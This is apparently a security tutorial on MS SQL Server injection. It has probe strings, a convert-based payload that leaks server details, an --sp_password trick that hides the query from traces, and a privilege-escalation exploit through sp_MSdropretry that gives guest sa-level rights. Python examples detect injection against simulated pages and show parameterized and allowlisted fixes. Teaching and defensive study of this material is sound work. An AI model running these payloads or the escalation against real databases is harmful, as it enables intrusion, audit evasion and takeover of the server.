SQL Injection Roundup (Part 5)

PART 3:
DETECTING SQL INJECTION
Append a SQL metacharacter to a parameter and watch for a database error in the response: a backend that concatenates the value into its query fails to parse the input and, on a page that echoes errors, leaks the message back to the client.

http://www.company.com/product/price.asp?id=1
select price from product where id=1

http://www.company.com/product/price.asp?id=1'
select price from product where id=1'
Unclosed quotation mark before the character string '

http://www.company.com/product/price.asp?id=[...]
CONVERT-MAGIC TECHNIQUE

http://www.company.com/product/price.asp?id=1 and 1=convert(int,@@version) --sp_password
select price from product where id=1 and 1=convert(int,@@version)--sp_password

Syntax error converting the nvarchar value 'Microsoft SQL Server 7.00 - 7.00.623 (Intel X86) Nov 23 1998 21:08:09 Copyright © 1988-1998 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 3)' to a column of data type int.

What the SQL Server trace records in place of the statement text, because the comment contains the token sp_password:
'sp_password' was found in the text of this event.-- The text has been replaced with this comment for security reasons.

convert(int, ...) fails on any non-numeric string and the error echoes the offending value, so the same trick reads out other server-side expressions:
• @@servername, db_name(), system_user, ...
Characters to try when probing a parameter:
• ' " ( )
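The probe-and-watch-for-errors routine and the convert-magic read-out, as an added Python example that is not part of the original slides: detect_injection() sends the slide's metacharacters to a page and reports which ones surface a database error, extract_leaked_value() parses a "Syntax error converting ..." message into the leaked string, and convert_magic_payload() builds the id value. The two pages, the product table and the response texts are constructed stand-ins backed by in-memory SQLite, so the errors they raise are SQLite's rather than SQL Server's; the signature list covers both. All function names are mine.

```python
import re
import sqlite3

# Error fragments that reveal the backend handed our input to the SQL parser.
# The first two are the SQL Server messages quoted in the slides; the SQLite
# ones are there because the simulated pages below run on SQLite.
DB_ERROR_SIGNATURES = (
    "Unclosed quotation mark",   # SQL Server: unbalanced string literal
    "Syntax error converting",   # SQL Server: the convert-magic message
    "unrecognized token",        # SQLite: stray quote character
    "incomplete input",          # SQLite: statement cut off mid-way
    "syntax error",              # SQLite / generic
)

# The metacharacters from the slides; each breaks the query in a different place.
PROBE_CHARS = ("'", '"', "(", ")")


def convert_magic_payload(expr, base_value="1"):
    """Value for the id parameter that leaks a string expression through an
    int conversion error. --sp_password is the slide's trick: SQL Server's
    trace replaces the statement text with a comment when it sees that token."""
    return f"{base_value} and 1=convert(int,{expr})--sp_password"


_CONVERT_ERROR = re.compile(
    r"converting the nvarchar value '(.*)' to a column of data type int", re.S)


def extract_leaked_value(error_body):
    """Pull the leaked string out of a 'Syntax error converting ...' message."""
    m = _CONVERT_ERROR.search(error_body)
    return m.group(1) if m else None


def find_db_error(body):
    """Return the matching signature if the response body carries a DB error."""
    low = body.lower()
    for sig in DB_ERROR_SIGNATURES:
        if sig.lower() in low:
            return sig
    return None


def detect_injection(page, base_value="1"):
    """page(value) -> response body. Returns [(probe_value, signature), ...]
    for every probe that produced a DB error while the baseline did not."""
    if find_db_error(page(base_value)):
        return []            # page errors on clean input: nothing to conclude
    hits = []
    for ch in PROBE_CHARS:
        probe = base_value + ch
        sig = find_db_error(page(probe))
        if sig:
            hits.append((probe, sig))
    return hits


# --- Constructed stand-ins for price.asp, backed by an in-memory SQLite DB ---
_conn = sqlite3.connect(":memory:")
_conn.execute("create table product(id integer primary key, price real)")
_conn.executemany("insert into product values (?, ?)",
                  [(1, 9.99), (2, 19.5), (3, 4.25)])
_conn.commit()


def vulnerable_page(id_param):
    """Concatenates the parameter into the query, as the slide's price.asp does,
    and echoes the database error text to the client."""
    try:
        rows = _conn.execute(
            "select price from product where id=" + id_param).fetchall()
        return "price=" + ",".join(str(r[0]) for r in rows)
    except sqlite3.Error as e:
        return "Database error: " + str(e)


def safe_page(id_param):
    """Validates the type, then binds the value; the query shape never changes."""
    if not id_param.isdigit():
        return "HTTP 400: id must be numeric"
    rows = _conn.execute(
        "select price from product where id=?", (int(id_param),)).fetchall()
    return "price=" + ",".join(str(r[0]) for r in rows)


if __name__ == "__main__":
    print(detect_injection(vulnerable_page))   # every probe triggers an error
    print(detect_injection(safe_page))         # []
    print(convert_magic_payload("@@version"))
```

Against a real target, page() would be an HTTP GET that returns the response body; the rest of the routine is unchanged. The safe page shows the two properties that defeat both techniques: the value is type-checked before it reaches the database, and it is bound as a parameter rather than spliced into the statement.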
MS-SQL CROSS-DATABASE OWNERSHIP-CHAINING FLAW

use testdatabase
-- a procedure owned by dbo of testdatabase that reads a table in master
create proc dbo.test as select * from master.dbo.sysxlogins
go
-- calling the procedure returns the same rows as querying the table directly
exec dbo.test
select * from master.dbo.sysxlogins

• sa == dbo (in a database owned by sa, dbo carries sa's SID 0x01)
• a db_owner can create and design objects owned by dbo
• owner SID of proc dbo.test == owner SID of master.dbo.sysxlogins, so the ownership chain is unbroken and the caller's permissions on master.dbo.sysxlogins are never checked
INJECTION IN MASTER..SP_MSDROPRETRY

CREATE PROCEDURE sp_MSdropretry
(@tname sysname, @pname sysname)
as
declare @retcode int
/*
** To public
*/
-- @tname is concatenated unquoted: whatever text the caller passes runs as SQL
exec ('drop table ' + @tname)
if @@ERROR <> 0 return(1)
-- the same for @pname
exec ('drop procedure ' + @pname)
if @@ERROR <> 0 return(1)
return (0)
PRIVILEGE ESCALATION VIA MASTER..SP_MSDROPRETRY

-- 1. a view owned by dbo of the current database over the user table of master
exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers'
-- 2. give dbo of the current database sa's SID (0x01) so the ownership chain to master's objects holds
exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx'
-- 3. through the view, give guest in master the SID and roles of dbo
exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''guest''','xx'
exec sp_executesql N'drop view dbo.test'

The statements sp_MSdropretry actually executes for steps 2 and 3; the injected update rides inside the @tname argument:
drop table xx update sysusers set sid=0x01 where name='dbo' drop procedure xx
drop table xx update dbo.test set sid=0x01,roles=0x01 where name='guest' drop procedure xx

• guest == db_owner of the master database
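An added example, not from the slides: a Python model of the two dynamic statements sp_MSdropretry builds, which reproduces the expanded text shown above for the slide's payload, beside a hardened expansion that allowlists each name and passes it through a QUOTENAME equivalent. The hardening is my suggestion, not anything the original procedure does; quotename(), is_plain_name() and the other function names are mine.

```python
import re


def quotename(identifier):
    """T-SQL QUOTENAME(@name): wrap in [] and double every ] inside the name,
    so the whole argument parses as one identifier, never as extra statements."""
    return "[" + identifier.replace("]", "]]") + "]"


# sysname is nvarchar(128); a plain object name is all the procedure expects.
_PLAIN_NAME = re.compile(r"^[A-Za-z_][A-Za-z0-9_]{0,127}$")


def is_plain_name(name):
    return _PLAIN_NAME.match(name) is not None


def expand_vulnerable(tname, pname):
    """The two strings the slide's sp_MSdropretry hands to exec()."""
    return ["drop table " + tname, "drop procedure " + pname]


def expand_quoted(tname, pname):
    """Quoting alone: the injected text becomes one (non-existent) table name."""
    return ["drop table " + quotename(tname), "drop procedure " + quotename(pname)]


def expand_hardened(tname, pname):
    """Allowlist first, then quote: anything that is not a bare name is refused
    before it gets near exec()."""
    for name in (tname, pname):
        if not is_plain_name(name):
            raise ValueError("not a plain object name: %r" % name)
    return expand_quoted(tname, pname)


def batch_text(statements):
    """Render the statements on one line, the way the slide prints them
    (in the procedure each exec() runs its string as its own batch)."""
    return " ".join(statements)


if __name__ == "__main__":
    # the @tname argument from the slide, after sp_executesql has unescaped '' to '
    injected = "xx update sysusers set sid=0x01 where name='dbo'"
    print(batch_text(expand_vulnerable(injected, "xx")))
    print(batch_text(expand_quoted(injected, "xx")))
    print(is_plain_name(injected), is_plain_name("xx"))
```

Quoting fixes the concatenation, but it does not change the other half of the problem the slide relies on: the procedure is granted to public and runs dynamic SQL as its owner, so restricting EXECUTE on it belongs to the fix as well.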
fantomas311(VNISS)